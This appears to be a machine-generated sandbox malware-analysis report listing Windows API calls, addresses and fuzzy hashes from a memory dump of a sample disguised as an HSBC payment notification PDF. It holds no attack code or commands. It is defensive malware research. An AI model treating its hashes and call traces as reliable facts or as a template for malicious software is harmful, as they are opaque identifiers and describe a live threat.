• OutputDebugStringW.KERNEL32(?), ref: 00455DBB
  • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
• __setmode.LIBCMT ref: 00420A1A
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
APIs
• _free.LIBCMT ref: 00435101
  • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
  • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
  • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
APIs
• _memset.LIBCMT ref: 004044CF
  • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
  • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
  • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
• KillTimer.USER32(?,00000001,?,?), ref: 00404524
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
APIs
  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
  • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
• gethostbyname.WSOCK32(?), ref: 00476399
• WSAGetLastError.WSOCK32(00000000), ref: 004763A4
• _memmove.LIBCMT ref: 004763D1
• inet_ntoa.WSOCK32(?), ref: 004763DC
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
• GetClientRect.USER32(?,?), ref: 0043B5FB
• GetCursorPos.USER32(?), ref: 0043B605
• ScreenToClient.USER32(?,?), ref: 0043B610
APIs
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                    • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                                                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                    • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0048B320
                                                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                                    • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                                                                                    • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                                                                                                                    • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                                                                                    • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                                                                                                                      • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                                                                                                                    • _memmove.LIBCMT ref: 00466C09
                                                                                                                                                    • _memset.LIBCMT ref: 00466C16
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 48991266-0
                                                                                                                                                    • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                                                                                    • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                                                                                                                    • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                                                                                    • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 00402231
                                                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00402258
                                                                                                                                                    • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1946975507-0
                                                                                                                                                    • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                                                                                    • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                                                                                                                    • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                                                                                    • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0045871B
                                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3974789173-0
                                                                                                                                                    • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                                                                                    • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                                                                                                                    • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                                                                                    • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: %I
• API String ID: 0-63094095
• Opcode ID: 942e1b8f80069f074c1b2c40e5fc917702e3634c8d599ac88492e2e2913508d1
• Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
• Opcode Fuzzy Hash: 942e1b8f80069f074c1b2c40e5fc917702e3634c8d599ac88492e2e2913508d1
• Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: __itow_s
• String ID: xbL$xbL
• API String ID: 3653519197-3351732020
• Opcode ID: 0203ba2e32099890d9dfc51e96d6d033b93f2ed1b6133ae6911d43c32e14ac44
• Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
• Opcode Fuzzy Hash: 0203ba2e32099890d9dfc51e96d6d033b93f2ed1b6133ae6911d43c32e14ac44
• Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
APIs
  • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
• __wcsnicmp.LIBCMT ref: 0046B02D
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
• Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
• Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
• Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
APIs
• Sleep.KERNEL32(00000000), ref: 00412968
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
• Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
• Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
• Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ClearVariant
• String ID: DdL$DdL
• API String ID: 1473721057-91670653
• Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
• Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
• Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
• Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
APIs
• _memset.LIBCMT ref: 0047259E
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
• Opcode ID: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
• Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
• Opcode Fuzzy Hash: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
• Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00486B17
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
• Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
• Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
• Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
APIs
• _memset.LIBCMT ref: 00462911
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: dcac2d535079ed9cd08b3b53e8268d9c526be6351065196aed15e3907edf445b
• Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
• Opcode Fuzzy Hash: dcac2d535079ed9cd08b3b53e8268d9c526be6351065196aed15e3907edf445b
• Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: Combobox
                                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                                    • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                                                                                    • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                                                                                                                                    • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                                                                                    • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                      • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                      • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00486C8B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
